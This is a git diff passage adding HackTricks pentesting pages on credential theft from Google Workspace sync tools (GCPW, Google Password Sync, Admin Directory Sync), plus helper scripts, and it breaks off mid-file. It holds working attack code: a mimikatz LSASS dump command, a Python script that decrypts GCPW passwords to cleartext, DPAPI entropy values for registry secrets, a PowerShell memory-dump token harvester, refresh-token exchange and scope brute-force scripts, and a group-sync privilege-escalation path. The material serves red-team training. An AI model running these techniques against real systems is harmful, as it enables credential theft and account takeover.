+          ["Alice Johnson", "28", "alice.johnson@example.com"]
+        ]
+      }' \
+  "https://sheets.googleapis.com/v4/spreadsheets/<SPREADSHEET_ID>/values/Sheet1!A2:C2?valueInputOption=USER_ENTERED"
+
+# Append data
+curl -X POST \
+  -H "Authorization: Bearer $access_token" \
+  -H "Content-Type: application/json" \
+  -d '{
+        "values": [
+          ["Bob Williams", "35", "bob.williams@example.com"]
+        ]
+      }' \
+  "https://sheets.googleapis.com/v4/spreadsheets/SPREADSHEET_ID/values/Sheet1!A:C:append?valueInputOption=USER_ENTERED"
+```
+
+</details>
+
+<details>
+
+<summary>https://www.googleapis.com/auth/ediscovery (Google Vault)</summary>
+
+**Google Workspace Vault** is an add-on for Google Workspace that provides tools for data retention, search, and export for your organization's data stored in Google Workspace services like Gmail, Drive, Chat, and more.
+
+* A **Matter** in Google Workspace Vault is a **container** that organizes and groups together all the information related to a specific case, investigation, or legal matter. It serves as the central hub for managing **Holds**, **Searches**, and **Exports** pertaining to that particular issue.
+* A **Hold** in Google Workspace Vault is a **preservation action** applied to specific users or groups to **prevent the deletion or alteration** of their data within Google Workspace services. Holds ensure that relevant information remains intact and unmodified for the duration of a legal case or investigation.
+
+```bash
+# List matters
+curl -X GET \
+  -H "Authorization: Bearer $access_token" \
+  "https://vault.googleapis.com/v1/matters?pageSize=10"
+
+# Create matter
+curl -X POST \
+  -H "Authorization: Bearer $access_token" \
+  -H "Content-Type: application/json" \
+  -d '{
+        "name": "Legal Case 2024",
+        "description": "Matter for the upcoming legal case involving XYZ Corp.",
+        "state": "OPEN"
+      }' \
+  "https://vault.googleapis.com/v1/matters"
+
+# Get specific matter
+curl -X GET \
+  -H "Authorization: Bearer $access_token" \
+  "https://vault.googleapis.com/v1/matters/<MATTER_ID>"
+
+# List holds in a matter
+curl -X GET \
+  -H "Authorization: Bearer $access_token" \
+  "https://vault.googleapis.com/v1/matters/<MATTER_ID>/holds?pageSize=10"
+```
+
+More [API endpoints in the docs](https://developers.google.com/vault/reference/rest).
+
+</details>
+
+## GCPW - Recovering clear text password
+
+To abuse GCPW to recover the clear text of the password it's possible to dump the encrypted password from **LSASS** using **mimikatz**:
+
+```bash
+mimikatz_trunk\x64\mimikatz.exe privilege::debug token::elevate lsadump::secrets exit
+```
+
+Then search for the secret like `Chrome-GCPW-<sid>` like in the image:
+
+<figure><img src="../../../.gitbook/assets/telegram-cloud-photo-size-4-6044191430395675441-x.jpg" alt=""><figcaption></figcaption></figure>
+
+Then, with an **access token** with the scope `https://www.google.com/accounts/OAuthLogin` it's possible to request the private key to decrypt the password:
+
+<details>
+
+<summary>Script to obtain the password in clear-text given the access token, encrypted password and resource id</summary>
+
+```python
+import requests
+from base64 import b64decode
+from Crypto.Cipher import AES, PKCS1_OAEP
+from Crypto.PublicKey import RSA
+
+def get_decryption_key(access_token, resource_id):
+    try:
+        # Request to get the private key
+        response = requests.get(
+            f"https://devicepasswordescrowforwindows-pa.googleapis.com/v1/getprivatekey/{resource_id}",
+            headers={
+                "Authorization": f"Bearer {access_token}"
+            }
+        )
+
+        # Check if the response is successful
+        if response.status_code == 200:
+            private_key = response.json()["base64PrivateKey"]
+            # Properly format the RSA private key
+            private_key = f"-----BEGIN RSA PRIVATE KEY-----\n{private_key.strip()}\n-----END RSA PRIVATE KEY-----"
+            return private_key
+        else:
+            raise ValueError(f"Failed to retrieve private key: {response.text}")
+
+    except requests.RequestException as e:
+        print(f"Error occurred while requesting the private key: {e}")
+        return None
+
+def decrypt_password(access_token, lsa_secret):
+    try:
+        # Obtain the private key using the resource_id
+        resource_id = lsa_secret["resource_id"]
+        encrypted_data = b64decode(lsa_secret["encrypted_password"])
+        
+        private_key_pem = get_decryption_key(access_token, resource_id)
+        print("Found private key:")
+        print(private_key_pem)
+        
+        if private_key_pem is None:
+            raise ValueError("Unable to retrieve the private key.")
+        
+        # Load the RSA private key
+        rsa_key = RSA.import_key(private_key_pem)
+        key_size = int(rsa_key.size_in_bits() / 8)
+        
+        # Decrypt the encrypted data
+        cipher_rsa = PKCS1_OAEP.new(rsa_key)
+        session_key = cipher_rsa.decrypt(encrypted_data[:key_size])
+        
+        # Extract the session key and other data from decrypted payload
+        session_header = session_key[:32]
+        session_nonce = session_key[32:]
+        mac = encrypted_data[-16:]
+        
+        # Decrypt the AES GCM data
+        aes_cipher = AES.new(session_header, AES.MODE_GCM, nonce=session_nonce)
+        decrypted_password = aes_cipher.decrypt_and_verify(encrypted_data[key_size:-16], mac)
+        
+        print("Decrypted Password:", decrypted_password.decode("utf-8"))
+    
+    except Exception as e:
+        print(f"Error occurred during decryption: {e}")
+
+# CHANGE THIS INPUT DATA!
+access_token = "<acces_token>" 
+lsa_secret = {
+    "encrypted_password": "<encrypted-password>",
+    "resource_id": "<resource-id>"
+}
+
+decrypt_password(access_token, lsa_secret)
+```
+
+</details>
+
+It's possible to find the key components of this in the Chromium source code:
+
+* API domain: [https://github.com/search?q=repo%3Achromium%2Fchromium%20%22devicepasswordescrowforwindows-pa%22\&type=code](https://github.com/search?q=repo%3Achromium%2Fchromium%20%22devicepasswordescrowforwindows-pa%22\&type=code)
+* API endpoint: [https://github.com/chromium/chromium/blob/21ab65accce03fd01050a096f536ca14c6040454/chrome/credential\_provider/gaiacp/password\_recovery\_manager.cc#L70](https://github.com/chromium/chromium/blob/21ab65accce03fd01050a096f536ca14c6040454/chrome/credential_provider/gaiacp/password_recovery_manager.cc#L70)
+
+## References
+
+* [https://www.youtube.com/watch?v=FEQxHRRP\_5I](https://www.youtube.com/watch?v=FEQxHRRP_5I)
+* [https://issues.chromium.org/issues/40063291](https://issues.chromium.org/issues/40063291)
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md b/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md
new file mode 100644
index 0000000000..36b122aa68
--- /dev/null
+++ b/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gps-google-password-sync.md
@@ -0,0 +1,221 @@
+# GPS - Google Password Sync
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+This is the binary and service that Google offers in order to **keep synchronized the passwords of the users between the AD** and Workspace. Every-time a user changes his password in the AD, it's set to Google.
+
+It gets installed in `C:\Program Files\Google\Password Sync` where you can find the binary `PasswordSync.exe` to configure it and `password_sync_service.exe` (the service that will continue running).
+
+### GPS - Configuration
+
+To configure this binary (and service), it's needed to **give it access to a Super Admin principal in Workspace**:
+
+* Login via **OAuth** with Google and then it'll **store a token in the registry (encrypted)**
+  * Only available in Domain Controllers with GUI
+* Giving some **Service Account credentials from GCP** (json file) with permissions to **manage the Workspace users**
+  * Very bad idea as those credentials never expired and could be misused
+  * Very bad idea give a SA access over workspace as the SA could get compromised in GCP and it'll possible to pivot to Workspace
+  * Google require it for domain controlled without GUI
+  * These creds are also stored in the registry
+
+Regarding AD, it's possible to indicate it to use the current **applications context, anonymous or some specific credentials**. If the credentials option is selected, the **username** is stored inside a file in the **disk** and the **password** is **encrypted** and stored in the **registry**.
+
+### GPS - Dumping password and token from disk
+
+{% hint style="success" %}
+Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GPS**, get information about the configuration and **even decrypt the password and token**.
+{% endhint %}
+
+In the file **`C:\ProgramData\Google\Google Apps Password Sync\config.xml`** it's possible to find part of the configuration like the **`baseDN`** of the AD configured and the **`username`** whose credentials are being used.
+
+In the registry **`HKLM\Software\Google\Google Apps Password Sync`** it's possible to find the **encrypted refresh token** and the **encrypted password** for the AD user (if any). Moreover, if instead of an token, some **SA credentials** are used, it's also possible to find those encrypted in that registry address. The **values** inside this registry are only **accessible** by **Administrators**.
+
+The encrypted **password** (if any) is inside the key **`ADPassword`** and is encrypted using **`CryptProtectData`** API. To decrypt it, you need to be the same user as the one that configured the password sync and use this **entropy** when using the **`CryptUnprotectData`**: `byte[] entropyBytes = new byte[] { 0xda, 0xfc, 0xb2, 0x8d, 0xa0, 0xd5, 0xa8, 0x7c, 0x88, 0x8b, 0x29, 0x51, 0x34, 0xcb, 0xae, 0xe9 };`
+
+The encrypted token (if any) is inside the key **`AuthToken`** and is encrypted using **`CryptProtecData`** API. To decrypt it, you need to be the same user as the one that configured the password sync and use this **entropy** when using the **`CryptUnprotectData`**: `byte[] entropyBytes = new byte[] { 0x00, 0x14, 0x0b, 0x7e, 0x8b, 0x18, 0x8f, 0x7e, 0xc5, 0xf2, 0x2d, 0x6e, 0xdb, 0x95, 0xb8, 0x5b };`\
+Moreover, it's also encoded using base32hex with the dictionary **`0123456789abcdefghijklmnopqrstv`**.
+
+The entropy values were found by using the tool . It was configured to monitor the calls to **`CryptUnprotectData`** and **`CryptProtectData`** and then the tool was used to launch and monitor `PasswordSync.exe` which will decrypt the configured password and auth token at the beginning and the tool will **show the values for the entropy used** in both cases:
+
+<figure><img src="../../../.gitbook/assets/telegram-cloud-photo-size-4-5782633230648853886-y.jpg" alt=""><figcaption></figcaption></figure>
+
+Note that it's also possible to see the **decrypted** values in the input or output of the calls to these APIs also (in case at some point Winpeas stop working).
+
+In case the Password Sync was **configured with SA credentials**, it will also be stored in keys inside the registry **`HKLM\Software\Google\Google Apps Password Sync`**.
+
+### GPS - Dumping tokens from memory
+
+Just like with GCPW, it's possible to dump the memory of the process of the `PasswordSync.exe` and the `password_sync_service.exe` processes and you will be able to find refresh and access tokens (if they have been generated already).\
+I guess you could also find the AD configured credentials.
+
+<details>
+
+<summary>Dump <code>PasswordSync.exe</code> and the <code>password_sync_service.exe</code> processes and search tokens</summary>
+
+```powershell
+# Define paths for Procdump and Strings utilities   
+$procdumpPath = "C:\Users\carlos-local\Downloads\SysinternalsSuite\procdump.exe"   
+$stringsPath = "C:\Users\carlos-local\Downloads\SysinternalsSuite\strings.exe"   
+$dumpFolder = "C:\Users\Public\dumps"   
+ 
+# Regular expressions for tokens 
+$tokenRegexes = @( 
+    "ya29\.[a-zA-Z0-9_\.\-]{50,}", 
+    "1//[a-zA-Z0-9_\.\-]{50,}" 
+) 
+ 
+# Show EULA if it wasn't accepted yet for strings 
+$stringsPath 
+ 
+# Create a directory for the dumps if it doesn't exist   
+if (!(Test-Path $dumpFolder)) {   
+    New-Item -Path $dumpFolder -ItemType Directory   
+}   
+ 
+# Get all Chrome process IDs   
+$processNames = @("PasswordSync", "password_sync_service")
+$chromeProcesses = Get-Process | Where-Object { $processNames -contains $_.Name } | Select-Object -ExpandProperty Id
+ 
+# Dump each Chrome process   
+foreach ($processId in $chromeProcesses) {   
+    Write-Output "Dumping process with PID: $processId"   
+    & $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp"   
+}   
+ 
+# Extract strings and search for tokens in each dump   
+Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object {   
+    $dumpFile = $_.FullName   
+    $baseName = $_.BaseName 
+    $asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt"   
+    $unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt"   
+ 
+    Write-Output "Extracting strings from $dumpFile"   
+    & $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile   
+    & $stringsPath -n 50 -nobanner -u $dumpFile > $unicodeStringsFile   
+ 
+    $outputFiles = @($asciiStringsFile, $unicodeStringsFile) 
+ 
+    foreach ($file in $outputFiles) { 
+        foreach ($regex in $tokenRegexes) { 
+ 
+            $matches = Select-String -Path $file -Pattern $regex -AllMatches 
+ 
+            $uniqueMatches = @{} 
+ 
+            foreach ($matchInfo in $matches) { 
+                foreach ($match in $matchInfo.Matches) { 
+                    $matchValue = $match.Value 
+                    if (-not $uniqueMatches.ContainsKey($matchValue)) { 
+                        $uniqueMatches[$matchValue] = @{ 
+                            LineNumber = $matchInfo.LineNumber 
+                            LineText   = $matchInfo.Line.Trim() 
+                            FilePath   = $matchInfo.Path 
+                        } 
+                    } 
+                } 
+            } 
+ 
+            foreach ($matchValue in $uniqueMatches.Keys) { 
+                $info = $uniqueMatches[$matchValue] 
+                Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)" 
+            } 
+        } 
+ 
+        Write-Output "" 
+    } 
+}
+```
+
+</details>
+
+### GPS - Generating access tokens from refresh tokens
+
+Using the refresh token it's possible to generate access tokens using it and the client ID and client secret specified in the following command:
+
+```bash
+curl -s --data "client_id=812788789386-chamdrfrhd1doebsrcigpkb3subl7f6l.apps.googleusercontent.com" \
+     --data "client_secret=4YBz5h_U12lBHjf4JqRQoQjA" \
+     --data "grant_type=refresh_token" \
+     --data "refresh_token=1//03pJpHDWuak63CgYIARAAGAMSNwF-L9IrfLo73ERp20Un2c9KlYDznWhKJOuyXOzHM6oJaO9mqkBx79LjKOdskVrRDGgvzSCJY78" \
+     https://www.googleapis.com/oauth2/v4/token
+```
+
+### GPS - Scopes
+
+{% hint style="info" %}
+Note that even having a refresh token, it's not possible to request any scope for the access token as you can only requests the **scopes supported by the application where you are generating the access token**.
+
+Also, the refresh token is not valid in every application.
+{% endhint %}
+
+By default GPS won't have access as the user to every possible OAuth scope, so using the following script we can find the scopes that can be used with the `refresh_token` to generate an `access_token`:
+
+<details>
+
+<summary>Bash script to brute-force scopes</summary>
+
+```bash
+curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do 
+    echo -ne "Testing $scope           \r"
+    if ! curl -s --data "client_id=812788789386-chamdrfrhd1doebsrcigpkb3subl7f6l.apps.googleusercontent.com" \
+     --data "client_secret=4YBz5h_U12lBHjf4JqRQoQjA" \
+     --data "grant_type=refresh_token" \
+     --data "refresh_token=1//03pJpHDWuak63CgYIARAAGAMSNwF-L9IrfLo73ERp20Un2c9KlYDznWhKJOuyXOzHM6oJaO9mqkBx79LjKOdskVrRDGgvzSCJY78" \
+     --data "scope=$scope" \
+     https://www.googleapis.com/oauth2/v4/token 2>&1 | grep -q "error_description"; then
+        echo ""
+        echo $scope
+        echo $scope >> /tmp/valid_scopes.txt
+    fi
+done
+
+echo ""
+echo ""
+echo "Valid scopes:"
+cat /tmp/valid_scopes.txt
+rm /tmp/valid_scopes.txt
+```
+
+</details>
+
+And this is the output I got at the time of the writing:
+
+```
+https://www.googleapis.com/auth/admin.directory.user
+```
+
+Which is the same one you get if you don't indicate any scope.
+
+{% hint style="danger" %}
+With this scope you could **modify the password of a existing user to escalate privileges**.
+{% endhint %}
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md b/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md
new file mode 100644
index 0000000000..ddb40cd9f4
--- /dev/null
+++ b/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gws-admin-directory-sync.md
@@ -0,0 +1,86 @@
+# GWS - Admin Directory Sync
+
+
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
+
+## Basic Information
+
+The main difference between this way to synchronize users with GCDS is that GCDS is done manually with some binaries you need to download and run while **Admin Directory Sync is serverless** managed by Google in [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories).
+
+At the moment of this writing this service is in beta and it supports 2 types of synchronization: From **Active Directory** and from **Azure Entra ID:**
+
+* **Active Directory:** In order to set this up you need to give **access to Google to you Active Directory environment**. And as Google only has access to GCP networks (via **VPC connectors**) you need to create a connector and then make your AD available from that connector by having it in VMs in the GCP network or using Cloud VPN or Cloud Interconnect. Then, you also need to provide **credentials** of an account with read access over the directory and **certificate** to contact via **LDAPS**.
+* **Azure Entra ID:** To configure this it's just needed to **login in Azure with a user with read access** over the Entra ID subscription in a pop-up showed by Google, and Google will keep the token with read access over Entra ID.
+
+Once correctly configured, both options will allow to **synchronize users and groups to Workspace**, but it won't allow to configure users and groups from Workspace to AD or EntraID.
+
+Other options that it will allow during this synchronization are:
+
+* Send an email to the new users to log-in
+* Automatically change their email address to the one used by Workspace. So if Workspace is using `@hacktricks.xyz` and EntraID users use `@carloshacktricks.onmicrosoft.com`, `@hacktricks.xyz` will be used for the users created in the account.
+* Select the **groups containing the users** that will be synced.
+* Select to **groups** to synchronize and create in Workspace (or indicate to synchronize all groups).
+
+### From AD/EntraID -> Google Workspace (& GCP)
+
+If you manage to compromise an AD or EntraID you will have total control of the users & groups that are going to be synchronized with Google Workspace.\
+However, notice that the **passwords** the users might be using in Workspace **could be the same ones or not**.
+
+#### Attacking users
+
+When the synchronization happens it might synchronize **all the users from AD or only the ones from a specific OU** or only the **users members of specific groups in EntraID**. This means that to attack a synchronized user (or create a new one that gets synchronized) you will need first to figure out which users are being synchronized.
+
+* Users might be **reusing the password or not from AD or EntraID**, but this mean that you will need to **compromise the passwords of the users to login**.
+* If you have access to the **mails** of the users, you could **change the Workspace password of an existing user**, or **create a new user**, wait until it gets synchronized an setup the account.
+
+Once you access the user inside Workspace it might be given some **permissions by default**.
+
+#### Attacking Groups
+
+You also need to figure out first which groups are being synchronized. Although there is the possibility that **ALL** the groups are being synchronized (as Workspace allows this).
+
+{% hint style="info" %}
+Note that even if the groups and memberships are imported into Workspace, the **users that aren't synchronized in the users sychronization won't be created** during groups synchronization even if they are members of any of the groups synchronized.
+{% endhint %}
+
+If you know which groups from Azure are being **assigned permissions in Workspace or GCP**, you could just add a compromised user (or newly created) in that group and get those permissions.
+
+There is another option to abuse existing privileged groups in Workspace. For example, the group `gcp-organization-admins@<workspace.email>` usually has high privileges over GCP.
+
+If the synchronization from, for example EntraID, to Workspace is **configured to replace the domain** of the imported object **with the email of Workspace**, it will be possible for an attacker to create the group `gcp-organization-admins@<entraid.email>` in EntraID, add a user in this group, and wait until the synchronization of all the groups happen.\
+**The user will be added in the group `gcp-organization-admins@<workspace.email>` escalating privileges in GCP.**
+
+### From Google Workspace -> AD/EntraID
+
+Note that Workspace require credentials with read only access over AD or EntraID to synchronize users and groups. Therefore, it's not possible to abuse Google Workspace to perform any change in AD or EntraID. So **this isn't possible** at this moment.
+
+I also don't know where does Google store the AD credentials or EntraID token and you **can't recover them re-configuring the synchronizarion** (they don't appear in the web form, you need to give them again). However, from the web it might be possible to abuse the current functionality to **list users and groups**.
+
+{% hint style="success" %}
+Learn & practice AWS Hacking:<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="../../../.gitbook/assets/image (1) (1) (1) (1).png" alt="" data-size="line">\
+Learn & practice GCP Hacking: <img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="../../../.gitbook/assets/image (2) (1).png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
+
+<details>
+
+<summary>Support HackTricks</summary>
+
+* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
+* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+
+</details>
+{% endhint %}
diff --git a/scripts/PSRoleJuggle.ps1 b/scripts/PSRoleJuggle.ps1
new file mode 100644
index 0000000000..a0c76406cc
--- /dev/null
+++ b/scripts/PSRoleJuggle.ps1
@@ -0,0 +1,75 @@
+# PowerShell script to check for role juggling possibilities using AWS CLI
+
+# Check for AWS CLI installation
+if (-not (Get-Command "aws" -ErrorAction SilentlyContinue)) {
+    Write-Error "AWS CLI is not installed. Please install it and configure it with 'aws configure'."
+    exit
+}
+
+# Function to list IAM roles
+function List-IAMRoles {
+    aws iam list-roles --query "Roles[*].{RoleName:RoleName, Arn:Arn}" --output json
+}
+
+# Initialize error count
+$errorCount = 0
+
+# List all roles
+$roles = List-IAMRoles | ConvertFrom-Json
+
+# Attempt to assume each role
+foreach ($role in $roles) {
+    $sessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
+    try {
+        $credentials = aws sts assume-role --role-arn $role.Arn --role-session-name $sessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
+        if ($credentials) {
+            Write-Host "Successfully assumed role: $($role.RoleName)"
+            Write-Host "Access Key: $($credentials.AccessKeyId)"
+            Write-Host "Secret Access Key: $($credentials.SecretAccessKey)"
+            Write-Host "Session Token: $($credentials.SessionToken)"
+            Write-Host "Expiration: $($credentials.Expiration)"
+
+            # Set temporary credentials to assume the next role
+            $env:AWS_ACCESS_KEY_ID = $credentials.AccessKeyId
+            $env:AWS_SECRET_ACCESS_KEY = $credentials.SecretAccessKey
+            $env:AWS_SESSION_TOKEN = $credentials.SessionToken
+
+            # Try to assume another role using the temporary credentials
+            foreach ($nextRole in $roles) {
+                if ($nextRole.Arn -ne $role.Arn) {
+                    $nextSessionName = "RoleJugglingTest-" + (Get-Date -Format FileDateTime)
+                    try {
+                        $nextCredentials = aws sts assume-role --role-arn $nextRole.Arn --role-session-name $nextSessionName --query "Credentials" --output json 2>$null | ConvertFrom-Json
+                        if ($nextCredentials) {
+                            Write-Host "Also successfully assumed role: $($nextRole.RoleName) from $($role.RoleName)"
+                            Write-Host "Access Key: $($nextCredentials.AccessKeyId)"
+                            Write-Host "Secret Access Key: $($nextCredentials.SecretAccessKey)"
+                            Write-Host "Session Token: $($nextCredentials.SessionToken)"
+                            Write-Host "Expiration: $($nextCredentials.Expiration)"
+                        }
+                    } catch {
+                        $errorCount++
+                    }
+                }
+            }
+
+            # Reset environment variables
+            Remove-Item Env:\AWS_ACCESS_KEY_ID
+            Remove-Item Env:\AWS_SECRET_ACCESS_KEY
+            Remove-Item Env:\AWS_SESSION_TOKEN
+        } else {
+            $errorCount++
+        }
+    } catch {
+        $errorCount++
+    }
+}
+
+# Output the number of errors if any
+if ($errorCount -gt 0) {
+    Write-Host "$errorCount error(s) occurred during role assumption attempts."
+} else {
+    Write-Host "No errors occurred. All roles checked successfully."
+}
+
+Write-Host "Role juggling check complete."
diff --git a/scripts/clean_gitbook.py b/scripts/clean_gitbook.py
new file mode 100644
index 0000000000..58f756eba3
--- /dev/null
+++ b/scripts/clean_gitbook.py
@@ -0,0 +1,66 @@
+import os
+import re
+
+def parse_summary(summary_file):
+    """Parse the SUMMARY.md file to extract listed Markdown pages."""
+    listed_pages = set()
+    with open(summary_file, "r", encoding="utf-8") as f:
+        for line in f:
+            match = re.search(r'\(([^)]+\.md)\)', line)
+            if match:
+                listed_pages.add(os.path.normpath(match.group(1)))
+    return listed_pages
+
+def find_all_markdown_files(base_dir):
+    """Find all Markdown (.md) files in the repository."""
+    all_files = set()
+    for root, _, files in os.walk(base_dir):
+        for file in files:
+            if file.endswith(".md"):
+                relative_path = os.path.relpath(os.path.join(root, file), base_dir)
+                if not any(p in relative_path for p in [".github/", "LICENSE.md", "SUMMARY.md"]):
+                    all_files.add(os.path.normpath(relative_path))
+    return all_files
+
+def delete_unused_files(base_dir, unused_files):
+    """Delete files that are not used."""
+    for file in unused_files:
+        full_path = os.path.join(base_dir, file)
+        if os.path.exists(full_path):
+            os.remove(full_path)
+            print(f"Deleted: {file}")
+        else:
+            print(f"File not found (already removed?): {file}")
+
+def main():
+    repo_dir = os.path.abspath(os.path.join(os.getcwd(), ".."))  # Parent directory as repository root
+    summary_file = os.path.join(repo_dir, "SUMMARY.md")
+
+    if not os.path.exists(summary_file):
+        print("ERROR: SUMMARY.md file not found in the repository root.")
+        return
+
+    print("Parsing SUMMARY.md...")
+    listed_pages = parse_summary(summary_file)
+
+    print("Finding all Markdown files...")
+    all_markdown_files = find_all_markdown_files(repo_dir)
+
+    unused_files = all_markdown_files - listed_pages
+
+    if not unused_files:
+        print("All Markdown files are used. No files to delete.")
+    else:
+        print("Unused Markdown files found:")
+        for file in unused_files:
+            print(file)
+
+        confirm = input("Do you want to delete these files? (yes/no): ").strip().lower()
+        if confirm == "yes":
+            delete_unused_files(repo_dir, unused_files)
+            print("Unused files deleted.")
+        else:
+            print("No files were deleted.")
+
+if __name__ == "__main__":
+    main()
diff --git a/scripts/translator.py b/scripts/translator.py
new file mode 100644
index 0000000000..524064ff06
--- /dev/null
+++ b/scripts/translator.py
@@ -0,0 +1,381 @@
+import argparse
+import os
+from openai import OpenAI #pip3 install openai
+import time
+import shutil
+import tempfile
+import subprocess
+import sys
+import tiktoken
+import concurrent.futures
+from tqdm import tqdm #pip3 install tqdm
+import traceback
+
+
+
+MASTER_BRANCH = "master"
+VERBOSE = True
+MAX_TOKENS = 10000 #gpt-4-1106-preview
+
+def reportTokens(prompt, model):
+    encoding = tiktoken.encoding_for_model(model)
+    # print number of tokens in light gray, with first 50 characters of prompt in green. if truncated, show that it is truncated
